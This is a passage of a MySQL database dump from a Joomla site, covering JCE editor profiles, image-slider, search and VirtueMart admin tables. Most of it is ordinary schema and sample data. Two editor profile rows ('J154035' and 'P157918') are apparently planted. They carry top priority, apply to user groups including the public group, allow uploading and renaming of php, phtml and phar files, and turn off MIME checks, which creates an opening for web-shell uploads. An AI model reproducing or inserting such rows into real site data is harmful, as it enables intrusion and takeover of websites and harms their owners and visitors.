INSERT INTO `fz6t4_wf_profiles` VALUES (1,'Default','Default Profile for all users','','3,4,5,10,6,7,8','',0,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,blockquote,formatselect,styleselect,removeformat,cleanup;fontselect,fontsizeselect,forecolor,backcolor,spacer,clipboard,indent,outdent,lists,sub,sup,textcase,charmap,hr;directionality,fullscreen,preview,source,print,searchreplace,spacer,table;visualaid,visualchars,visualblocks,nonbreaking,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','charmap,contextmenu,browser,inlinepopups,media,help,clipboard,searchreplace,directionality,fullscreen,preview,source,table,textcase,print,style,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,formatselect,styleselect,fontselect,fontsizeselect,fontcolor,hr',1,1,0,'0000-00-00 00:00:00',''),(2,'Front End','Sample Front-end Profile','','3,4,5,10','',1,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,formatselect,styleselect;clipboard,searchreplace,indent,outdent,lists,cleanup,charmap,removeformat,hr,sub,sup,textcase,nonbreaking,visualchars,visualblocks;fullscreen,preview,print,visualaid,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','charmap,contextmenu,inlinepopups,help,clipboard,searchreplace,fullscreen,preview,print,style,textcase,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,formatselect,styleselect,hr',0,2,0,'0000-00-00 00:00:00',''),(3,'Blogger','Simple Blogging Profile','','3,4,5,10,6,7,8','',0,'desktop,tablet,phone','bold,italic,strikethrough,lists,blockquote,spacer,justifyleft,justifycenter,justifyright,spacer,link,unlink,imgmanager,article,spellchecker,fullscreen,kitchensink;formatselect,styleselect,underline,justifyfull,clipboard,removeformat,charmap,indent,outdent,undo,redo,help','link,imgmanager,article,spellchecker,fullscreen,kitchensink,clipboard,contextmenu,inlinepopups,lists,formatselect,styleselect,hr',0,3,0,'0000-00-00 00:00:00','{\"editor\":{\"toggle\":\"0\"}}'),(4,'Mobile','Sample Mobile Profile','','3,4,5,10,6,7,8','',0,'tablet,phone','undo,redo,spacer,bold,italic,underline,formatselect,spacer,justifyleft,justifycenter,justifyfull,justifyright,spacer,fullscreen,kitchensink;styleselect,lists,spellchecker,article,link,unlink','fullscreen,kitchensink,spellchecker,article,link,inlinepopups,lists,formatselect,styleselect',0,4,0,'0000-00-00 00:00:00','{\"editor\":{\"toolbar_theme\":\"mobile\",\"resizing\":\"0\",\"resize_horizontal\":\"0\",\"resizing_use_cookie\":\"0\",\"toggle\":\"0\",\"links\":{\"popups\":{\"default\":\"\",\"jcemediabox\":{\"enable\":\"0\"},\"window\":{\"enable\":\"0\"}}}}}'),(5,'J154035','','','1,8','',0,'desktop,tablet,phone','[]','browser,image,media,link,file',1,-99999,0,'0000-00-00 00:00:00','{\"browser\":{\"filetypes\":\"images=jpg,jpeg,png,gif;files=php,txt,gif\",\"upload\":{\"max_size\":\"102400\",\"validate_mimetype\":\"0\",\"add_random\":\"0\"},\"features\":{\"upload\":1,\"folder\":{\"rename\":1},\"file\":{\"rename\":1}}}}'),(6,'P157918','','','1,8','',0,'desktop,tablet,phone','[]','browser,image,media,link,file',1,-99999,0,'0000-00-00 00:00:00','{\"browser\":{\"filetypes\":\"images=jpg,jpeg,png,gif;files=php,phtml,phar,txt,gif\",\"upload\":{\"max_size\":\"102400\",\"validate_mimetype\":\"0\",\"add_random\":\"0\"},\"features\":{\"upload\":1,\"folder\":{\"rename\":1},\"file\":{\"rename\":1}}}}');
/*!40000 ALTER TABLE `fz6t4_wf_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_cis_categories`
--

DROP TABLE IF EXISTS `myaou_cis_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_cis_categories` (
  `id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `name` text NOT NULL,
  `published` tinyint(1) NOT NULL,
  `publish_up` datetime NOT NULL,
  `publish_down` datetime NOT NULL,
  `ordering` mediumint unsigned NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_cis_categories`
--

LOCK TABLES `myaou_cis_categories` WRITE;
/*!40000 ALTER TABLE `myaou_cis_categories` DISABLE KEYS */;
INSERT INTO `myaou_cis_categories` VALUES (1,'Uncategorized',1,'0000-00-00 00:00:00','0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_cis_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_cis_images`
--

DROP TABLE IF EXISTS `myaou_cis_images`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_cis_images` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `id_user` int unsigned NOT NULL,
  `id_slider` int unsigned NOT NULL,
  `name` text NOT NULL,
  `img_name` text NOT NULL,
  `img_url` text NOT NULL,
  `readmoresize` text NOT NULL,
  `readmoreicon` text NOT NULL,
  `showreadmore` tinyint unsigned NOT NULL,
  `readmoretext` text NOT NULL,
  `readmorestyle` text NOT NULL,
  `overlaycolor` text NOT NULL,
  `overlayopacity` tinyint unsigned NOT NULL,
  `textcolor` text NOT NULL,
  `overlayfontsize` int unsigned NOT NULL,
  `textshadowcolor` text NOT NULL,
  `textshadowsize` tinyint unsigned NOT NULL,
  `showarrows` tinyint unsigned NOT NULL,
  `readmorealign` tinyint unsigned NOT NULL,
  `readmoremargin` text NOT NULL,
  `captionalign` tinyint unsigned NOT NULL,
  `captionmargin` text NOT NULL,
  `overlayusedefault` tinyint unsigned NOT NULL,
  `buttonusedefault` tinyint unsigned NOT NULL,
  `caption` text NOT NULL,
  `redirect_url` text NOT NULL,
  `redirect_itemid` int unsigned NOT NULL,
  `redirect_target` tinyint unsigned NOT NULL,
  `published` tinyint(1) NOT NULL,
  `publish_up` datetime NOT NULL,
  `publish_down` datetime NOT NULL,
  `created` datetime NOT NULL,
  `ordering` mediumint unsigned NOT NULL,
  `popup_img_name` text NOT NULL,
  `popup_img_url` text NOT NULL,
  `popup_open_event` tinyint unsigned NOT NULL DEFAULT '4',
  PRIMARY KEY (`id`),
  KEY `id_slider` (`id_slider`),
  KEY `id_user` (`id_user`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_cis_images`
--

LOCK TABLES `myaou_cis_images` WRITE;
/*!40000 ALTER TABLE `myaou_cis_images` DISABLE KEYS */;
INSERT INTO `myaou_cis_images` VALUES (1,0,1,'Face to face with nature...','','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item1-tmb.jpg','normal','pencil',1,'Read More!','red','#000000',50,'#ffffff',18,'#000000',2,0,1,'0px 10px 10px 10px',0,'10px 15px 10px 15px',0,0,'By <a href=\"http://creative-solutions.net/joomla/creative-image-slider\" target=\"_blank\">Creative Image Slider...</a>','#',104,1,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','2014-02-27 06:36:13',1,'','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item1.jpg',4),(2,0,1,'Face to face with nature...','','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item2-tmb.jpg','normal','pencil',1,'Read More!','red','#000000',50,'#ffffff',18,'#000000',2,0,1,'0px 10px 10px 10px',0,'10px 15px 10px 15px',0,0,'By <a href=\"http://creative-solutions.net/joomla/creative-image-slider\" target=\"_blank\">Creative Image Slider...</a>','#',104,0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','2014-02-27 06:33:44',2,'','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item2.jpg',4),(3,0,1,'Face to face with nature...','','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item3-tmb.jpg','normal','pencil',1,'Read More!','red','#000000',50,'#ffffff',18,'#000000',2,0,1,'0px 10px 10px 10px',0,'10px 15px 10px 15px',0,0,'By <a href=\"http://creative-solutions.net/joomla/creative-image-slider\" target=\"_blank\">Creative Image Slider...</a>','#',104,0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','2014-02-27 06:36:58',3,'','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item3.jpg',4),(4,0,1,'Face to face with nature...','','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item4-tmb.jpg','normal','pencil',1,'Read More!','red','#000000',50,'#ffffff',18,'#000000',2,0,1,'0px 10px 10px 10px',0,'10px 15px 10px 15px',0,0,'By <a href=\"http://creative-solutions.net/joomla/creative-image-slider\" target=\"_blank\">Creative Image Slider...</a>','#',104,0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','2014-02-27 06:38:21',4,'','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item4.jpg',4),(5,0,1,'Face to face with nature...','','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item5-tmb.jpg','normal','pencil',1,'Read More!','red','#000000',50,'#ffffff',18,'#000000',2,0,1,'0px 10px 10px 10px',0,'10px 15px 10px 15px',0,0,'By <a href=\"http://creative-solutions.net/joomla/creative-image-slider\" target=\"_blank\">Creative Image Slider...</a>','#',104,0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','2014-07-13 19:21:47',5,'','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item5.jpg',4),(6,0,1,'Face to face with nature...','','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item6-tmb.jpg','normal','pencil',1,'Read More!','red','#000000',50,'#ffffff',18,'#000000',2,0,1,'0px 10px 10px 10px',0,'10px 15px 10px 15px',0,0,'By <a href=\"http://creative-solutions.net/joomla/creative-image-slider\" target=\"_blank\">Creative Image Slider...</a>','#',104,0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','2014-02-27 06:34:40',6,'','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item6.jpg',4),(7,0,1,'Face to face with nature...','','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item7-tmb.jpg','normal','pencil',1,'Read More!','red','#000000',50,'#ffffff',18,'#000000',2,0,1,'0px 10px 10px 10px',0,'10px 15px 10px 15px',0,0,'By <a href=\"http://creative-solutions.net/joomla/creative-image-slider\" target=\"_blank\">Creative Image Slider...</a>','#',104,1,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','2014-02-27 06:40:29',7,'','http://creative-solutions.net/images/sliders/face-to-face-with-nature/item7.jpg',4);
/*!40000 ALTER TABLE `myaou_cis_images` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_cis_sliders`
--

DROP TABLE IF EXISTS `myaou_cis_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_cis_sliders` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `id_user` int unsigned NOT NULL,
  `id_category` int unsigned NOT NULL,
  `id_template` smallint unsigned NOT NULL,
  `name` text NOT NULL,
  `width` text NOT NULL,
  `height` int unsigned NOT NULL,
  `margintop` int unsigned NOT NULL,
  `marginbottom` int unsigned NOT NULL,
  `itemsoffset` int unsigned NOT NULL,
  `paddingtop` int unsigned NOT NULL,
  `paddingbottom` int unsigned NOT NULL,
  `bgcolor` text NOT NULL,
  `readmoresize` text NOT NULL,
  `readmoreicon` text NOT NULL,
  `showreadmore` tinyint unsigned NOT NULL,
  `readmoretext` text NOT NULL,
  `readmorestyle` text NOT NULL,
  `overlaycolor` text NOT NULL,
  `overlayopacity` tinyint unsigned NOT NULL,
  `textcolor` text NOT NULL,
  `overlayfontsize` int unsigned NOT NULL,
  `textshadowcolor` text NOT NULL,
  `textshadowsize` tinyint unsigned NOT NULL,
  `showarrows` tinyint unsigned NOT NULL,
  `readmorealign` tinyint unsigned NOT NULL,
  `readmoremargin` text NOT NULL,
  `captionalign` tinyint unsigned NOT NULL,
  `captionmargin` text NOT NULL,
  `alias` text NOT NULL,
  `created` datetime NOT NULL,
  `publish_up` datetime NOT NULL,
  `publish_down` datetime NOT NULL,
  `published` tinyint(1) NOT NULL,
  `checked_out` int unsigned NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `access` int unsigned NOT NULL,
  `featured` tinyint unsigned NOT NULL,
  `ordering` int NOT NULL,
  `language` char(7) NOT NULL,
  `arrow_template` smallint unsigned NOT NULL DEFAULT '37',
  `arrow_width` smallint unsigned NOT NULL DEFAULT '32',
  `arrow_left_offset` smallint unsigned NOT NULL DEFAULT '10',
  `arrow_center_offset` smallint NOT NULL DEFAULT '0',
  `arrow_passive_opacity` smallint unsigned NOT NULL DEFAULT '70',
  `move_step` int unsigned NOT NULL DEFAULT '600',
  `move_time` int unsigned NOT NULL DEFAULT '600',
  `move_ease` int unsigned NOT NULL DEFAULT '60',
  `autoplay` tinyint unsigned NOT NULL DEFAULT '1',
  `autoplay_start_timeout` int unsigned NOT NULL DEFAULT '3000',
  `autoplay_step_timeout` int unsigned NOT NULL DEFAULT '5000',
  `autoplay_evenly_speed` int unsigned NOT NULL DEFAULT '28',
  `autoplay_hover_timeout` int unsigned NOT NULL DEFAULT '800',
  `overlayanimationtype` tinyint unsigned NOT NULL DEFAULT '0',
  `popup_max_size` tinyint unsigned NOT NULL DEFAULT '90',
  `popup_item_min_width` smallint unsigned NOT NULL DEFAULT '300',
  `popup_use_back_img` tinyint unsigned NOT NULL DEFAULT '1',
  `popup_arrow_passive_opacity` tinyint unsigned NOT NULL DEFAULT '70',
  `popup_arrow_left_offset` tinyint unsigned NOT NULL DEFAULT '12',
  `popup_arrow_min_height` tinyint unsigned NOT NULL DEFAULT '25',
  `popup_arrow_max_height` tinyint unsigned NOT NULL DEFAULT '50',
  `popup_showarrows` tinyint unsigned NOT NULL DEFAULT '1',
  `popup_image_order_opacity` tinyint unsigned NOT NULL DEFAULT '70',
  `popup_image_order_top_offset` tinyint unsigned NOT NULL DEFAULT '12',
  `popup_show_orderdata` tinyint unsigned NOT NULL DEFAULT '1',
  `popup_icons_opacity` tinyint unsigned NOT NULL DEFAULT '50',
  `popup_show_icons` tinyint unsigned NOT NULL DEFAULT '1',
  `popup_autoplay_default` tinyint unsigned NOT NULL DEFAULT '1',
  `popup_closeonend` tinyint unsigned NOT NULL DEFAULT '1',
  `popup_autoplay_time` int unsigned NOT NULL DEFAULT '5000',
  `popup_open_event` tinyint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `id_user` (`id_user`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_cis_sliders`
--

LOCK TABLES `myaou_cis_sliders` WRITE;
/*!40000 ALTER TABLE `myaou_cis_sliders` DISABLE KEYS */;
INSERT INTO `myaou_cis_sliders` VALUES (1,0,1,1,'Nature [Slider Example]','100%',250,0,0,2,2,2,'#000000','mini','picture',1,'View Image','blue','#000000',50,'#ffffff',17,'#000000',2,1,1,'0px 10px 10px 10px',0,'10px 15px 15px 15px','','2014-01-16 20:51:38','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0,'0000-00-00 00:00:00',0,0,1,'',26,28,10,0,50,600,600,60,1,3000,5000,25,800,0,90,150,1,50,12,30,50,1,70,12,1,50,1,1,1,5000,0);
/*!40000 ALTER TABLE `myaou_cis_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_cis_templates`
--

DROP TABLE IF EXISTS `myaou_cis_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_cis_templates` (
  `id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `name` text NOT NULL,
  `styles` text NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL,
  `publish_down` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_cis_templates`
--

LOCK TABLES `myaou_cis_templates` WRITE;
/*!40000 ALTER TABLE `myaou_cis_templates` DISABLE KEYS */;
INSERT INTO `myaou_cis_templates` VALUES (1,'Test Template','',1,'0000-00-00 00:00:00','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `myaou_cis_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_finder_tokens`
--

DROP TABLE IF EXISTS `myaou_finder_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_finder_tokens` (
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '1',
  `context` tinyint unsigned NOT NULL DEFAULT '2',
  `language` char(3) NOT NULL DEFAULT '',
  KEY `idx_word` (`term`),
  KEY `idx_context` (`context`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_finder_tokens`
--

LOCK TABLES `myaou_finder_tokens` WRITE;
/*!40000 ALTER TABLE `myaou_finder_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_finder_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_finder_tokens_aggregate`
--

DROP TABLE IF EXISTS `myaou_finder_tokens_aggregate`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_finder_tokens_aggregate` (
  `term_id` int unsigned NOT NULL,
  `map_suffix` char(1) NOT NULL,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint unsigned NOT NULL DEFAULT '0',
  `term_weight` float unsigned NOT NULL,
  `context` tinyint unsigned NOT NULL DEFAULT '2',
  `context_weight` float unsigned NOT NULL,
  `total_weight` float unsigned NOT NULL,
  `language` char(3) NOT NULL DEFAULT '',
  KEY `token` (`term`),
  KEY `keyword_id` (`term_id`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_finder_tokens_aggregate`
--

LOCK TABLES `myaou_finder_tokens_aggregate` WRITE;
/*!40000 ALTER TABLE `myaou_finder_tokens_aggregate` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_finder_tokens_aggregate` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_postinstall_messages`
--

DROP TABLE IF EXISTS `myaou_postinstall_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_postinstall_messages` (
  `postinstall_message_id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `extension_id` bigint NOT NULL DEFAULT '700' COMMENT 'FK to #__extensions',
  `title_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for the title',
  `description_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for description',
  `action_key` varchar(255) NOT NULL DEFAULT '',
  `language_extension` varchar(255) NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys',
  `language_client_id` tinyint NOT NULL DEFAULT '1',
  `type` varchar(10) NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action',
  `action_file` varchar(255) DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method',
  `action` varchar(255) DEFAULT '' COMMENT 'Action method name or URL',
  `condition_file` varchar(255) DEFAULT NULL COMMENT 'RAD URI to file holding display condition method',
  `condition_method` varchar(255) DEFAULT NULL COMMENT 'Display condition method, must return boolean',
  `version_introduced` varchar(50) NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced',
  `enabled` tinyint NOT NULL DEFAULT '1',
  PRIMARY KEY (`postinstall_message_id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_postinstall_messages`
--

LOCK TABLES `myaou_postinstall_messages` WRITE;
/*!40000 ALTER TABLE `myaou_postinstall_messages` DISABLE KEYS */;
INSERT INTO `myaou_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',1),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(3,700,'COM_CPANEL_WELCOME_BEGINNERS_TITLE','COM_CPANEL_WELCOME_BEGINNERS_MESSAGE','','com_cpanel',1,'message','','','','','3.2.0',1),(4,700,'COM_CPANEL_MSG_PHPVERSION_TITLE','COM_CPANEL_MSG_PHPVERSION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/phpversion.php','admin_postinstall_phpversion_condition','3.2.2',1);
/*!40000 ALTER TABLE `myaou_postinstall_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_adminmenuentries`
--

DROP TABLE IF EXISTS `myaou_virtuemart_adminmenuentries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_adminmenuentries` (
  `id` tinyint unsigned NOT NULL AUTO_INCREMENT,
  `module_id` tinyint unsigned NOT NULL DEFAULT '0' COMMENT 'The ID of the VM Module, this Item is assigned to',
  `parent_id` tinyint unsigned NOT NULL DEFAULT '0',
  `name` char(64) NOT NULL DEFAULT '0',
  `link` char(64) NOT NULL DEFAULT '0',
  `depends` char(64) NOT NULL DEFAULT '' COMMENT 'Names of the Parameters, this Item depends on',
  `icon_class` char(96) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `tooltip` char(128) DEFAULT NULL,
  `view` char(32) DEFAULT NULL,
  `task` char(32) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `module_id` (`module_id`),
  KEY `published` (`published`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=utf8mb3 COMMENT='Administration Menu Items';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_adminmenuentries`
--

LOCK TABLES `myaou_virtuemart_adminmenuentries` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_adminmenuentries` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_adminmenuentries` VALUES (1,1,0,'COM_VIRTUEMART_CATEGORY_S','','','vmicon vmicon-16-folder_camera',1,1,'','category',''),(2,1,0,'COM_VIRTUEMART_PRODUCT_S','','','vmicon vmicon-16-camera',2,1,'','product',''),(3,1,0,'COM_VIRTUEMART_PRODUCT_CUSTOM_FIELD_S','','','vmicon vmicon-16-document_move',5,1,'','custom',''),(4,1,0,'COM_VIRTUEMART_PRODUCT_INVENTORY','','','vmicon vmicon-16-price_watch',7,1,'','inventory',''),(5,1,0,'COM_VIRTUEMART_CALC_S','','','vmicon vmicon-16-calculator',8,1,'','calc',''),(6,1,0,'COM_VIRTUEMART_REVIEW_RATE_S','','','vmicon vmicon-16-comments',9,1,'','ratings',''),(7,2,0,'COM_VIRTUEMART_ORDER_S','','','vmicon vmicon-16-page_white_stack',1,1,'','orders',''),(8,2,0,'COM_VIRTUEMART_COUPON_S','','','vmicon vmicon-16-shopping',10,1,'','coupon',''),(9,2,0,'COM_VIRTUEMART_REPORT','','','vmicon vmicon-16-chart_bar',3,1,'','report',''),(10,2,0,'COM_VIRTUEMART_USER_S','','','vmicon vmicon-16-user',4,1,'','user',''),(11,2,0,'COM_VIRTUEMART_SHOPPERGROUP_S','','','vmicon vmicon-16-user-group',5,1,'','shoppergroup',''),(12,3,0,'COM_VIRTUEMART_MANUFACTURER_S','','','vmicon vmicon-16-wrench_orange',1,1,'','manufacturer',''),(13,3,0,'COM_VIRTUEMART_MANUFACTURER_CATEGORY_S','','','vmicon vmicon-16-folder_wrench',2,1,'','manufacturercategories',''),(14,4,0,'COM_VIRTUEMART_STORE','','','vmicon vmicon-16-reseller_account_template',1,1,'','user','editshop'),(15,4,0,'COM_VIRTUEMART_MEDIA_S','','','vmicon vmicon-16-pictures',2,1,'','media',''),(16,4,0,'COM_VIRTUEMART_SHIPMENTMETHOD_S','','','vmicon vmicon-16-lorry',3,1,'','shipmentmethod',''),(17,4,0,'COM_VIRTUEMART_PAYMENTMETHOD_S','','','vmicon vmicon-16-creditcards',4,1,'','paymentmethod',''),(18,5,0,'COM_VIRTUEMART_CONFIGURATION','','','vmicon vmicon-16-config',1,1,'','config',''),(19,5,0,'COM_VIRTUEMART_USERFIELD_S','','','vmicon vmicon-16-participation_rate',2,1,'','userfields',''),(20,5,0,'COM_VIRTUEMART_ORDERSTATUS_S','','','vmicon vmicon-16-document_editing',3,1,'','orderstatus',''),(21,5,0,'COM_VIRTUEMART_CURRENCY_S','','','vmicon vmicon-16-coins',5,1,'','currency',''),(22,5,0,'COM_VIRTUEMART_COUNTRY_S','','','vmicon vmicon-16-globe',6,1,'','country',''),(23,11,0,'COM_VIRTUEMART_MIGRATION_UPDATE','','','vmicon vmicon-16-installer_box',0,1,'','updatesmigration',''),(24,11,0,'COM_VIRTUEMART_ABOUT','','','vmicon vmicon-16-info',10,1,'','about',''),(25,11,0,'COM_VIRTUEMART_HELP_TOPICS','http://docs.virtuemart.net/','','vmicon vmicon-16-help',5,1,'','',''),(26,11,0,'COM_VIRTUEMART_COMMUNITY_FORUM','http://forum.virtuemart.net/','','vmicon vmicon-16-reseller_programm',7,1,'','',''),(27,11,0,'COM_VIRTUEMART_STATISTIC_SUMMARY','','','vmicon vmicon-16-info',1,1,'','virtuemart',''),(28,11,0,'COM_VIRTUEMART_LOG','','','vmicon vmicon-16-info',2,1,'','log',''),(29,11,0,'COM_VIRTUEMART_SUPPORT','','','vmicon vmicon-16-help',3,1,'','support','');
/*!40000 ALTER TABLE `myaou_virtuemart_adminmenuentries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_calc_categories`
--

DROP TABLE IF EXISTS `myaou_virtuemart_calc_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_calc_categories` (
  `id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_category_id` mediumint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_category_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_calc_categories`
--

LOCK TABLES `myaou_virtuemart_calc_categories` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_calc_countries`
--

DROP TABLE IF EXISTS `myaou_virtuemart_calc_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_calc_countries` (
  `id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_country_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_country_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_calc_countries`
--

LOCK TABLES `myaou_virtuemart_calc_countries` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_calc_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_calc_manufacturers`
--

DROP TABLE IF EXISTS `myaou_virtuemart_calc_manufacturers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
